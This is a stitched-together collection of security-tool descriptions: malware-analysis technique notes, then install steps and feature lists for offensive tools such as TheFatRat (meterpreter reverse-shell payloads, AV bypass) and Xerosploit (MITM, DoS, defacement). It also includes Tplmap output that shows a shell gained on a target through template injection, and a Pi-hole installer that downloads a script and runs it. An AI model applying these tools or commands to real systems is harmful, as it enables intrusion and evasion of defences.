•     Strings search: Strings are plain text ASCII and UNICODE characters embedded within a file. Strings search give clues about the functionality and commands associated with a malicious file. Although strings do not provide complete picture of the function and capability of a file, they can yield information like file names, URL, domain names, ip address, attack commands etc. 
•     File obfuscation (packers, cryptors) detection: Malware authors often use softwares like packers and cryptors to obfuscate the contents of the file in order to evade detection from anti-virus softwares and intrustion detection systems. This technique slows down the malware analysts from reverse engineering the code. 
•     Determine Fuzzy Hash: Comparing the malware samples collected or maintained in a private or public repository is an important part of file identification process. The easiest way to check for file similarity is through a process called “Fuzzy Hashing”. Fuzzy hash comparison can tell the percentage similarity between the files. Fuzzy hash comparison is a method by which identical files can be identified. This can help in determine the variants of the same malware. 
•     Submission to online Antivirus scanning services: This will help you determine if the malicious code signatures exist for the suspect file. The signature name for the specific file provides an excellent way to gain additional information about the file and capabilities. By visiting the respective antivirus vendor web sites or searching for the signature in search engines can yield additional details about the suspect file. Such information may help in further investigation and reduce the analysis time of the malware specimen. VirusTotal (http://www.virustotal.com) is a popular web based malware scanning services.
•     Inspecting File Dependencies: Executable loads multiple shared libraries and call api functions to perform certain actions like resolving domain names, establishing an http connection etc. Determining the type of shared library and list of api calls imported by an executable can give an idea on the functionality of the malware. 
•    Examining ELF File Structure: ELF stands for “Executable and Linkable Format” this is a standard binary file format for Linux systems. Examining the ELF file structure can yield wealth of the information including Sections, Symbols and other file metadata information. 
•     Disassembling the File: Examining the suspect program in a disassembler allows the investigator to explore the instructions that will be executed by the malware. Disassembly can help in tracing the paths that are not usually determined during dynamic analysis.

•     Monitoring Process Activity: This involves executing the malicious program and examining the properties of the resulting process and other processes running on the infected system. This technique can reveal information about the process like process name, process id, child processes created, system path of the executable program, modules loaded by the suspect program. 
•     Monitoring File System Activity: This involves examining the real time file system activity while the malware is running; this technique reveals information about the opened files, newly created files and deleted files as a result of executing the malware sample. 
•     Monitoring Network Activity: In addition to monitoring the activity on the infected host system, monitoring the network traffic to and from the system during the course of running the malware sample is also important. This helps to identify the network capabilities of the specimen and will also allow us to determine the network based indicator which can then be used to create signatures on security devices like Intrusion Detection System 
•     System Call Tracing: System calls made by malware can provide insight into the nature and purpose of the executed program such as file, network and memory access. Monitoring the system calls can help determine the interaction of the malware with the operating system. 

•     running processes 
•     network connections
•     shared libraries
•     loaded kernel modules 
•     code injections 
•     Rootkit capabilities. 
•     API Hooking

• 1.7 GHz processor (for example Intel Celeron) or better.
• 2.0 GB RAM (system memory).
• 8 GB of free hard drive space for installation.
• Either a CD/DVD drive or a USB port for the installer media.
• Internet access is helpful (for installing updates during the installation process).

• Checks for metasploit service and starts if not present
• Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android and Mac and another
• Start multiple meterpreter reverse_tcp listners
• Fast Search in searchsploit
• Bypass AV
• Drop into Msfconsole
• Some other fun stuff :)

git clone https://github.com/Screetsec/TheFatRat.git
cd Fatrat    

• Extract The lalin-master to your home or another folder
• chmod +x fatrat
• chmod +x powerfull.sh
• And run the tools ( ./fatrat )
• Easy to Use just input your number

• A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling / Cyborg / Parrot / Dracos / BackTrack / Backbox / and another operating system ( linux )
  
• Must install metasploit framework
  
• required gcc program , i586-mingw32msvc-gcc or i686-w64-mingw32-gcc ( apt-get install mingw32 ) for fix error
  

• Thanks to allah and Screetsec [ Edo -maland- ]
• Offensive Security for the awesome OS ( http://www.offensive-security.com/ )
• http://www.kali.org/ "
  
• Jack Wilder admin in http://www.linuxsec.org
• And another open sources tool in github
• Uptodate new tools hacking visit http://www.kitploit.com

• nmap
• hping3
• build-essential
• ruby-dev
• libpcap-dev
• libgmp3-dev
• tabulate
• terminaltables

git clone https://github.com/LionSec/xerosploit
cd xerosploit && sudo python install.py
sudo xerosploit

• Port scanning
• Network mapping
• Dos attack
• Html code injection
• Javascript code injection
• Download intercaption and replacement
• Sniffing
• Dns spoofing
• Background audio reproduction
• Images replacement
• Drifnet
• Webpage defacement and more ...

• Website : http://lionsec.net
• Youtube : https://youtube.com/inf98es
• Facebook : https://facebook.com/in98
• Twitter: @LionSec1
• Email : ledonman@gmail.com

sudo apt-get update
sudo apt-get install redis-server nmap

git clone https://github.com/m0nad/HellRaiser/
cd HellRaiser/hellraiser/
bundle install

redis-server

bundle exec sidekiq

rails s

1. Install Raspbian
   
2. Run the command below (downloads this script in case you want to read over it first!)
   

wget -O basic-install.sh https://install.pi-hole.net
chmod +x basic-install.sh
./basic-install.sh

{
    "domains_being_blocked": "136708",
    "dns_queries_today": "18108",
    "ads_blocked_today": "14648",
    "ads_percentage_today": "80.89"
}

• Pi-hole stats in your Mac's menu bar
• Get LED alerts for each blocked ad
• Pi-hole on Ubuntu 14.04 on VirtualBox
• x86 Docker container that runs Pi-hole
• Splunk: Pi-hole Visualizser
• Pi-hole Chrome extension ( open source )
• Go Bananas for CHiP-hole ad blocking
• Sky-Hole
• Pi-hole in the Cloud!
• unRaid-hole -- Repo and more info
• Pi-hole on/off button
• Minibian Pi-hole

• Adafruit livestream install
• TekThing: 5 fun, easy projects for a Raspberry Pi
• Pi-hole on Adafruit's blog
• The Defrag Show - MSDN/Channel 9
• MacObserver Podcast 585
• Medium: Block All Ads For $53
• MakeUseOf: Adblock Everywhere, The Pi-hole Way
• Lifehacker: Turn Your Pi Into An Ad Blocker With A Single Command !
• Pi-hole on TekThing
• Pi-hole on Security Now! Podcast
• Foolish Tech Show
• Pi-hole on Ubuntu
• Catchpoint: iOS 9 Ad Blocking

• Python 2.6+
• Works on Linux, Windows, Mac OSX, BSD

$ pip install pocsuite

$ wget https://github.com/knownsec/Pocsuite/archive/master.zip
$ unzip master.zip

The application is currently under heavy development and misses some functionalities.

$ ./tplmap.py -u 'http://www.target.com/app?id=*' 
[+] Tplmap 0.1d
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Found placeholder in GET parameter 'inj'
[+] Smarty plugin is testing rendering with tag '{*}'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
...
[+] Freemarker plugin is testing blind injection
[+] Velocity plugin is testing rendering with tag '#set($c=*)\n${c}\n'
[+] Jade plugin is testing rendering with tag '\n= *\n'
[+] Jade plugin has confirmed injection with tag '\n= *\n'
[+] Tplmap identified the following injection point:

  Engine: Jade
  Injection: \n= *\n
  Context: text
  OS: darwin
  Technique: render
  Capabilities:

   Code evaluation: yes, javascript code
   Shell command execution: yes
   File write: yes
   File read: yes
   Bind and reverse shell: yes

[+] Rerun tplmap providing one of the following options:

   --os-shell or --os-cmd to execute shell commands via the injection
   --upload LOCAL REMOTE to upload files to the server
   --download REMOTE LOCAL to download remote files
   --bind-shell PORT to bind a shell on a port and connect to it
   --reverse-shell HOST PORT to run a shell back to the attacker's HOST PORT

$ ./tplmap.py -u 'http://www.target.com/app?id=*' --os-shell
[+] Run commands on the operating system.
linux $ whoami
www-data
linux $ ls -al /etc/passwd
-rw-r--r--  1 root  wheel  5925 16 Sep  2015 /etc/passwd
linux $

1. Ensure wireshare’s share is working and can collect on the desired interface or read pcap files.
2. Run redis-server and listening on local port 6379
3. run pdns2_collect.py with -i for an interface or -p for a pcap file
4. Anytime the collection is working, try pdns2_query.py with the options available.

  Domain                                   ips             first     date      rr    ttl   count   
  w2.eff.org                               69.50.232.52    20120524  20120524  CNAME 300   3        
  web5.eff.org                             69.50.232.52    20120524  20120524  A     300   3        
  slashdot.org                             216.34.181.45   20120524  20120524  A     2278  1        
  csi.gstatic.com                          74.125.143.120  20120524  20120524  A     300   1        
  ssl.gstatic.com                          74.125.229.175  20120524  20120524  A     244   1        
  xkcd.com                                 107.6.106.82    20120524  20120524  A     600   1        
  imgs.xkcd.com                            69.9.191.19     20120524  20120524  CNAME 418   1        
  www.xkcd.com                             107.6.106.82    20120524  20120524  CNAME 600   1        
  craphound.com                            204.11.50.137   20120524  20120524  A     861   1        
  www.youtube.com                          173.194.37.4    20120524  20120524  CNAME 81588 1        

arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
  -i IP, --ip IP
  -da DATE, --date DATE
  -ips IP_SNIFF, --ip_sniff IP_SNIFF
  -ttl TTL, --ttl TTL
  -rr RRECORD, --rrecord RRECORD
  -l LOCAL, --local LOCAL
  -ac ACOUNT, --acount ACOUNT
  -c COUNT, --count COUNT
  -ipf IP_FLUX, --ip_flux IP_FLUX
  -ipr IP_REVERSE, --ip_reverse IP_REVERSE


-d *example.com     seeks all domains that end with example.com
-i 1.1.1.1          ip address search
-ttl 0              use a number like 0 or 100 to get all the TTL of a specific value search is based on domain not IP
-ac  *example.com            return by query, counts of counts (usage), or 'hits' for the domains in order, *.google.com or *.com are examples 

-l               search entire database local resolved IP addresses that resolve to 127.0.0.1 etc. 
-ipf *.com       return a COUNT of domains in the IP space for each instance of a domain, use with ip_reverse
-ipr * seattletimes.com use with ip_flux, enumerate domains in the IP space

-ips 192.168.1.1'    search the domain space for a specific IP address, different then searching by IP 
-da 20130101          return all records by date

ADMINISTRATIVE
delete_key('Domain:*delete*') Dangerous command, deletes a key, must use the entire key such as Domain: or IP:
raw_record('Domain:xalrbngb-0.t.nessus.org') view the raw record properties (no wildcards) use full key name
pDNS2 tracks current state and last known, it is a snapshot of organization perception, not a log.